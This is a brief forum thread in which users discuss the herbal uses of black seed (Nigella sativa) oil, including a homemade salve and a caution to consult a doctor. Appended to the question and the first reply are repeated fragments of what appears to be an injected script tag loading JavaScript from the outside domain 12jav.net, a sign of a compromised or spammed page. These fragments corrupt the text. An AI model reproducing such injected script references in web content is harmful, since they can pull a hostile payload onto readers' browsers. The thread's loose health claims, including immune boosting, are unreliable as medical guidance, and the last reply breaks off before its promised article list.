Hii I got black seed (kim) oil as a gift from my friend. I dont know anything about it besides basic google search so does anyone know the benefits of it in herbalism? Thank you for answers sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Black seed oil is mainly used as an anti-inflammatory and is a good antioxidant. You can make a soothing healing salve from it be mixing it with coconut oil and a bit of beeswax. I have never heard it called “Kim”, What is the scientific name listed on the bottle? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Nigella Sativa (also known as black seed) is an amazing herb for medication. Though I would be careful and consult with your doctor before using it since studies have shown that is can boost the immune system and do a lot of other amazing health benefits. But the research on humans is limited (but this may have changed over-time). I suggest reading these articles:
